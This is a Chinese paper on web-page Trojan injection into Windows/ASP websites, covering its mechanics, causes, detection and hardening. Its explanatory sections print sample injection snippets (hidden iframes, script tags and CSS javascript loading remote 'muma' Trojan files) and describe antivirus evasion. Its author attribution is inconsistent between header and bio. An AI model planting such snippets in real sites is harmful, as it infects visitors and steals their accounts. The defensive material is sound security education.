windows平台下ASP网站被挂马的原因及防范的研究

windows 平台下网站被挂马的原因与对策防范的研究
牟红睿
（新疆天业集团，新疆石河子 742500）
摘要：随着网络技术的不断发展，网络上的各种攻击技术也越来越隐密，方法更加多样化。

网页挂马就是常用的攻击方式之一，本文通过分析网页中挂马的原理、类型及方式，以及网页挂马的原因，经过大量实践研究总结出服务器和客户端各种网页挂马的检测方法及防范对策。

关键字：网站挂马；原因；检测方法；防范对策；
随着计算机网络技术的不断发展，互联网安全形势也逐渐严峻，网络上的各种攻击手段也在变得越来越隐秘，方法也更多样化。

根据《瑞星2012年中国信息安全综合报告》，2012年1至12月瑞星“云安全”系统截获挂马网站516万个网页，比2011年同期增加了48.7%[1]。

网页挂马不仅对网站的安全运行造成威胁，而且对于用户来说，有可能造成个人信息泄露、各种账户及密码被窃取等严重恶劣影响。

1.网页挂马的原理
网站挂马又称之为网页隐藏式恶意连结,就是攻击者在正常的页面中插入一段伪代码，当浏览该网页时，这段代码就会被执行，同时下载并运行所调用的木马服务器端程序，进而控制浏览者的主机，以便对用户实施各种攻击[2]。

作为网页挂马的散布者，其目的是将木马下载到用户本地，并进一步执行，当木马获得执行之后，就意味着会有更多的木马被下载，进一步被执行，进入一个恶性的循环，从而使用户的电脑遭到攻击和控制。

2.网页挂木马的过程及挂马方法
网页挂马实际上一个html 网页而已，但它与其它网页不通的是该网页是经过精心制作的。

当用户访问该网页时就会中木马，这些网页利用了浏览器漏洞或者操作系统漏洞等，让浏览器在后台自动下载指定位置的木马并安装或直接运行。

这些过程都在后台运行，用户很难察觉的到。

挂马只是一种手段，其目的是将木马传播出去。

以远程控制为目的的木马，是为了得到大量的肉鸡，以此对某些网站实施控制和修改。

以获取信息为目的的木马，是为了获取各种账号信息。

2.1网站挂马攻击过程
(1)将准备好的木马程序上传到申请的空间中，运行木马生成器，在“木马地址”中填入已经上传到空间中的木马网址，然后点击“生成网马”按钮，即可在程序的同目录生成一个网页木马。

运行网马加密软件，在“欲加密的网页”中浏览选中生成的网页木马对其进行加密，最后将其上传到网页空间中，并保证和空间中的木马程序位于同一目录中。

(2)黑客利用工具软件搜索有脚本缺陷或漏洞的网站进行入侵，得到网站的webshell ，然后利用各种挂马方式编辑网站首页的内容，插入相应的挂马代码。

(3)当网站的浏览者浏览该网站时，浏览者点击某个连接或者浏览某个页面，就会转引到黑客预先设计好的木马连接陷阱。

(4)
浏览者在不知情的情况下，本地图 2利用木马攻击过程
电脑会被植入木马程序，这段程序就会被执行，进而控制浏览者的主机，以便对用户施展各种攻击。

(如图2所示网页挂马的过程图)。

挂马方式有很多，其原理就是在一个正常的网页中做一个指向存在木马的地址指向。

以Script 挂马为例，Script标签用于定义客户端脚本，比如JavaScript。

Script元素即可包含脚本语句，也可以通过src属性指向外部脚本文件。

实现常见的图像操作、表单验证以及动态内容更新等。

但是src的这个功能被攻击者的利用，比如在网页中插入
<SCRIPT language="JScript.Encode" src=/muma.txt></script> 、<script type=""text/javascript"" src=""/js/shareto_button.js"" charset=""utf-8"">、
<script TYPE="text/javascript" language="javascript" src="/ver.asp?
Ver=VIP">、<script src="/count/mystat.asp">、<script src=" /Common.js" type=text/javascript></script>等各种形式。

黑客可以把木马植入muma.txt、shareto_button.js、ver.asp、mystat.asp等文件中，这就会导致用户在打开正常的页面是也访问了含有漏洞溢出的页面，虽然用户看不到这个页面，但这个页面却被执行了。

下面我们针对这种挂马流程做一个具体的过程：
首先，准备一款木马软件，比如PcShare、灰鸽子等，PcShare是一款功能强大的远程管理软件，可以在内网、外网任意位置随意管理需要的远程主机，有超强的隐藏和自我修复等功能。

上传到黑客构建的服务器上，并记下可以通过Web访问的有效地址路径。

其次，编写一个网页木马。

这个网页木马被执行后就会下载在第一步准备的木马软件。

最后，在正常的页面挂上前面准备好的木马了。

就是利用Script指向你的网页木马的地址，这样当用户在访问正常页面时，网页木马也会得到执行。

2.2挂马方法
网页挂马中所使用的木马隐蔽性都很高。

黑客为躲避杀毒软件对所挂木马的查杀，常使用2 种方法对所挂木马进行特殊处理:①加壳处理，即对源文件经过特殊的算法进行压缩、变形，经过这道工序后木马程序就会逃过大部分杀毒软件的查杀;②修改特征码，即黑客对木马中特征码部分的代码进行修改，将其加密或使用汇编指令将其跳转，致使杀毒软件无法找到病毒特征码，从而不能将其判定为病毒。

常见的挂马方式如下:
Iframe框架挂马。

Iframe是HTML语言标记，作用是文档中的文档，或者浮动的框架(FRAME)。

黑客在一些正常的网页中设置一些高度或宽度为零的隐藏框架，这样用户在打开正常网页时候，看不到这个页面存在的木马地址指向，于是木马就被执行。

Javascript挂马。

它的隐蔽性较iframe高，更难发现；而且javascript挂马时可以将脚本直接写在被挂的页面中，也可以通过注入网页，让网站远程调取异地的js脚本。

javascript的灵活性较高，这让它拥有了一张随时可以变换的面孔，很容易蒙混过关，导致木马久杀不绝。

比如在javascript代码中有一个Window的open功能，<SCRIPT language=javascript>
window.open (“木马地址”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1”); </script> 。

或者先将脚本代码保存为一个独立的js文件，并上传到一个黑客的服务器中，然后用一句<script language=javascript src=http://%53%35%35%FE%78%/ muma.js></script>语句就可以了。

CSS挂马。

如今交互式的Web2.0网站越来越多，允许用户设置与修改的博客、SNS社区等这些互动性非常强的社区和博客中，往往会提供丰富的功能，并且会允许用户使用CSS层叠样式表来对网站的网页进行自由的修改。

黑客在利用CSS挂马时，往往是借着网民对某些大网站的信任，将CSS恶意代码挂到博客或者其他支持CSS的网页中，当网民在访问该网页时恶意代码就会执行[3]。

比如下面这段代码:
Body{Background-image:url('javascript:document。

write('path'));}"background-image"在css中功能是定义页面背景图片，而这段代码可以通过"background-image"配合javascript代码让网页悄
悄地在用户的电脑中运行。

但这段代码有个问题，就是在运行时会出现空白的页面，影响网页访问者正常的访问，因此比较容易发现。

或者body { background-image: url('javascript:document.write(”<script src=/muma.js></script>”)') } ，muma.js内容是document.write(”<iframe src=地址width=0 height=0></iframe>”) 。

background-image：url（t：open（”http：///muma.html”，”newwindow”，”border=”1″Height=0，Width=0，top=1000，center=0，toolbar=no，menubar=no，scrollbars=no，resizable=no，location=no，status=no”）），这段代码使用了t的Open开窗，通过新开一个隐藏的窗口，在后台悄悄地运行新窗口并激活访问网页溢出木马页面，不会影响访问者观看网页内容，因此更加隐蔽。

图片伪装挂马。

攻击者利用黑客工具软件将网页中的木马代码植入到图片文件中，然后利用代码调用执行，它是一种比较新颖的隐蔽挂马方法。

实例代码如：
<html><iframe src="/test.htm" height=0 width=0></iframe> <img src="/test.jpg"></center> </html>注：当用户打开/test.htm 是，显示给用户的是/test.jpg，而/test.htm网页代码也随之运行。

图片伪装。

<html> <iframe src="网马地址" height=0 width=0></iframe> <img src="图片地址"></center> </html>
以上几中虽然列出了常见的网页木马驻扎方式，但随着时间的推移，这些挂马方式将会演变成各种各样的形态，旨在盗取不同的机密与链接恶意用户指定的木马载有页，以达下载更多的木马病毒霍乱被感染的计算机，让其成为新的病毒木马载体源，从而为新一轮的感染创造条件。

2.3木马的执行方法
木马在完成下载之后，执行的方式有: ①利用页面元素渲染过程中的格式溢出执行shellcode 进一步下载的木马;②利用脚本运行的漏洞执行木马;③伪装成缺失组件的安装包被浏览器自动执行;④通过脚本调用com 组件利用其漏洞执行木马;⑤利用页面元素渲染过程中的格式溢出直接执行木马;⑥利用com 组件与外部其他程序通讯，通过其他程序启动木马。

为了躲开杀毒软件的查杀，一些网马还会进行以下操作: ①修改系统时间，使杀毒软件失效;②摘除杀毒软件的HOOK 挂钩，使杀毒软件检测失效;③修改杀毒软件病毒库，使之检测不到恶意代码; ④通过溢出漏洞不直接执行恶意代码，而是执行一段调用脚本，以躲避杀毒软件对父进程的检测。

3.ASP网站被挂马的原因
3.1Windows服务器或应用程序存在安全漏洞
Windows Server方便快捷，但是仍然存在着安全隐患，系统本身的漏洞。

通过缓冲区溢出漏洞直接获得CMDSHELL或者系统权限。

比如说IIS写权限漏洞，可以匿名访问IIS，并且写入ASP木马，获得WEBSHELL。

如果管理员疏于管理，不及时的安装补丁，就可能导致漏洞被攻击者利用从而篡改网页进行挂马。

浏览器、应用软件总是存在各种各样的漏洞，只要这些漏洞能够被利用并执行任意代码，那么存在漏洞的系统就有可能受到网页木马攻击。

网页挂马是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序等各种方法获得网站管理员账号，然后登陆网站后台，通过数据库的备份或者上传漏洞等获得网站管理权限。

利用网站管理权限修改网站页面的内容，向页面中加入恶意转向代码等。

3.2 ASP网站存在漏洞
ASP网站漏洞主要有注入漏洞、跨站漏洞、旁注漏洞、上传漏洞、暴库漏洞和程序漏洞等等。

网页代码编写的问题主要体现在两个方面，一是有数据库操作的代码对用户提交的参数没有严格进行限制，导致用户可以利用特定的输入参数对数据库进行读写操作，从而得以向数据中插
入挂马链接，这也就是我们常说的SQL 注入攻击。

代码编写存在的另一种问题是网站页面代码本身实现了上传附件的功能，但是在实现过程中对用户所上传附件的文件类型限制不严，导致攻击者可以上传木马文件控制服务器进而对网页进行挂马（常见于开源的论坛搭建代码）。

3.3计算机病毒导致网页被挂马
一些病毒感染系统后会在系统上所有的网页文件中加入挂马链接，如果感染病毒的是Web 服务器或者是用于网页开发的系统，那么网站的网页中就可能被插入挂马链接。

还有一些病毒则会通过ARP 欺骗来劫持整个局域网内80端口的链接，并修改网络数据包，插入挂马链接。

如果Web 服务器所在的局域网内有其他机器感染这类病毒就可能导致外部用户访问到的页面存在挂马链接。

由于Linux 系统的下的病毒数量远少于Windows ，这也是造成IIS+ASP 比其他搭配更容易遭受挂马攻击的原因之一。

4. 网页挂马的检查与防范措施
4.1检查网站是否被挂马
(1)利用搜索功能。

操作系统或者Macromedia
Dreamweaver 有搜索功能，对常见挂马的关键字
Iframe 、.js 、<script>等进行搜索，查看网页中这些语句
中是否包含木马地址。

(2)第三方软件。

比如360安全卫士、360网站安全
检测、网站安全狗、护卫神·网页挂马清理工具等工具，
对网站漏洞，虚假、欺骗，挂马、恶意，恶意篡改，敏
感内容进行友情检测，如如图3护卫神·网页挂马清理
工具扫描结果 4.2防范网页挂马
网页挂马是因为网站或者操作系统存在漏洞等，这也是网页挂马防范的重点。

(1)检查网站的漏洞
利用IBM Rational AppScan 7.8、啊D 、明小子等工具检查网站存在的漏洞。

常见的ASP 网站漏洞包括上传漏洞，SQL 注入漏洞，身份验证漏洞，COOKIES 注入漏洞分析，XSS 跨站漏洞等。

网站的管理者需要对网站进行测试，这就需要网站管理者掌握基本的攻击技能。

比如上传文件功能，需要使用任何类型的文件进行上传测试，查看网站的上传功能对上传文件是否有严格的审查。

比如网站的访问权限设置，给网站设置不同的权限，查看会给网站带来怎样的攻击机会，存在什么安全隐患。

对于网站存在的漏洞，通过编程使其完善。

(2)操作系统安全维护
服务器存在的漏洞也可以被攻击，常见的漏洞有目录泄露、CGI 源码泄露、目录遍历、执行任意命令、缓冲区溢出、拒绝服务等[3]。

在操作系统的安全方面，windows 2008比windows2003做出更大的提高。

建议使用较新的操作系统。

对于操作系统的漏洞，通过系统的自动更新或者第三方操作系统漏洞修复软件及时的修补系统的漏洞。

对于IE 浏览器，漏洞也比较多，因此要及时的更新补丁。

在安全防护方面，安装安全防护软件就可对恶意网页挂马攻击进行基本拦截。

在安装一些比较好的WEB 第三方防护软件，比如安装服务器安全狗、IIS 安全狗等。

(3)操作系统安全设置
更改系统的环境变量，木马本质上是一种程序，其运行需要平台。

如VBS 、JS 平台等。

在操作系统[我的电脑]-[属性]-[高级]-[环境变量]中，找到PA THEXT 变量名，将这里面的一些经常容易被网页木马利用的变量值删除。

如VBS 、JS 这些变量是木马经常使用的，将其删掉。

对于C:\Windows\System32目录下的这些命令cmd.exe 、net.exe 、ping.exe 、netstat.exe 、ftp.exe 、telnet.exe 等，设置为只允许administrators 组访问，这样既防止攻击者新建用户对系统进行修改。

图表 3护卫神扫描结果
防御网页被挂马及其防止网页木马在服务器上运行通常是卸载危险ASP组件。

WScript. Shell、Shell. application 这两个组件一般一些ASP 木马或一些恶意程序都会使用到需要卸载
卸载Wscript.Shell对象，在cmd先或者直接在运行：regsvr32 /u %windir%\system32\WSHom.Ocx，卸载Fso对象，在cmd下或者直接在运行：regsvr32.exe /u %windir%\system32\scrrun.dll，卸载Stream对象，在cmd下或者直接在运行：regsvr32.exe /u /s "C：\Program Files\Common Files\System\ado\msado15.dll"[3]。

日常要多维护，定期检查网站文件，根据文件目录及其文件属性判断哪些文件及文件夹是最近被修改过的。

通过比较修改时间来检查是否有非法用户上传文件，通过阅读页面源码检查网站是否存在木马。

通过杀毒软件或者第三方软件(网站安全狗、护卫神网页挂马清理工具等)扫描木马。

启用和审核Web站点日志记录, 可以查看否有非法上传文件、SQL注入等，及时发现和排除可疑文件。

定期备份网站源码及数据库文件，当发现被入侵，可及时修复网站源码内容。

(4) IIS方面的设置
IIS 漏洞有近千余种期中能被用来入侵的漏洞，通过这些漏洞也可以入侵到我们网站的数据库。

服务器安全狗对服务器存在的账户、进程、端口、目录权限、网络连接等加固。

合理的设置网站的访问权限也至关重要。

IIS 在windows 系统默认不安装，安装IIS 时根据自己的实际需要，选择必要的组件进行安装，打上IIS 的最新补丁。

IIS部分映射对于ASP的站点来说是无用的，需要将cer、cdx、asa、htr、idc、shtm、shtm、stm、printer等为扩展名的文件删除, 防止入侵者利用IIS漏洞而植入木马。

可以使用微软的UPLScan安全工具、IIS锁定工具、HFN etChk安全工具和基线安全分析器(MBSA )等来加强系统和IIS的安全。

4.3客户端检测防御方式
(1)要养成看网页源代码的习惯
养成良好的上网习惯，不要随意打开默认网站，尤其是域名为.com的网站。

注意杀毒防护软件的提示，不要随意打开不明链接和未知程序。

特别是在下载文档和软件、视频和音乐文件等，要进行认真杀毒。

特别是使用网上银行或者其他类似的关键应用时，要有安全意识。

(2)安装防护软件，及时更新系统补丁
安装金山卫士、360安全卫士、QQ电脑管家等后，首次运行会对电脑进行全方位的安全体检，并给出电脑体检结果。

从这里我们可以看到当前电脑存在的一些问题，包括浏览器首页是否被篡改、系统漏洞、实时保护是否开启、系统是否存在恶意插件等，针对存在的问题，可以点击其后的“立即修复”进行快速修复。

在“实时保护”中，我们可以看到实时保护包括漏洞防护、关键位置防护、进程防护、U盘防护、网页防护等，开启实时保护中的各项功能。

(3)浏览器方面
在浏览器方面，用户可通过浏览器安全参数设置及可信赖站点设置等手段防范网页木马的攻击，如禁用浏览器ACTIVEX控件和插件脚本，可以减少基于ACTIVE的网页挂马的攻击。

IE8、IE7要比IE6的安全性能强，windows7下IE8浏览器默认开启了数据执行保护，可以在一定程度上保护用户系统免受恶意代码的攻击。

在浏览器安全级别设置上，IE9、IE8安全设置增多，给用户访问网页提供更强大的保护。

通过工具——internet选项，从安全、隐私、高级等几个方面对浏览器进行加强。

网站被挂马肯定是存在漏洞，网站管理员必须加强检测，及时有效的升级系统、关闭必要的服务和端口，及时打补丁、堵漏洞，与此同时积极采取防篡改、防挂马等措施。

如发现网站存在极大的安全隐患，应积极咨询业内专家或信息安全机构。

同时要提高管理员的木马识别能力，学会看网页的源代码。

木马是一定的代码来实现。

了解木马的工作原理、变现形式、欺骗的手段以及未来的发展趋势等。

只有网站管理者加固站点的安全，从源头上杜绝网页木马，才能为用户提供安全的浏览环境。

网页挂马的技术门槛并不高，互联网上可以得到很多现成的攻击工具。

同时网页木马隐蔽性
高，挂马所用代码在浏览器中的执行、网页木马的执行和恶意程序的下载运行，用户都无法察觉。

网页挂马的传播范围同被挂马网页的数量和浏览量成正比。

各种类型的网站都可以成为网页挂马的对象。

上述这些原因使得网页挂马成为攻击者传播木马或病毒的最有效手段之一。

网站数量的日益增长，很多网站却成了黑客的目标，黑客为了赚钱不惜一切代价，去入侵网站并挂马，导致互联网的黑色链接越来越丰富。

危害分为两面：(1)对于用户的影响。

盗窃银行卡、网游账号、电子邮件或即时聊天工具（如腾讯QQ）的账号密码，窃取私密文件或私人信息，这些内容一旦泄露，会对受害者造成物质或精神上的损失。

(2)对于站长们的影响。

网站被挂马后，搜索引擎会立刻降权，排名都会下降，网站信誉降低，网站数据也有可能会被窃取并传播。

参考文献：
1. 《瑞星2012年中国信息安全综合报告》网址：/about/news/rising/2013-01-15/13051.html
2. 网页挂马_百度百科网址：/view/13125
3.htm
3.警惕网页特效CSS挂马网址：/art/201009/226261.htm
3.安晓瑞. 关于网站使用ACCESS 数据库安全性的分析[J].高师学报,2012(2):45-48
作者简介：
***(1985-),男，汉族，甘肃两当县人。

陇南师范高等专科学校网络中心助教，主要从事网络安全、网络编程、网络服务等理论与实践的研究。

通讯地址：
甘肃省成县陇南师范高等专科学校网络中心，E-mail: anxr728@
For ASP Web pages get Trojan of harmfulness and prevention countermeasures
AN Xiao-Rui
（Network Center，Longnan Teachers College，Chengxian Gansu 742500）Abstract：Page get Trojan poses a threat not only to the safe operation of the Web site, but also to users, Web pages get Trojan attacks will directly result in disclosure of personal information, a variety of serious effects such as account and password hacking. get Trojan and Trojan harmfulness a Web page, sum up the pages get Trojan detection and prevention countermeasure of the Trojan.
Key words：ASP web site, harmfulness；prevention countermeasures。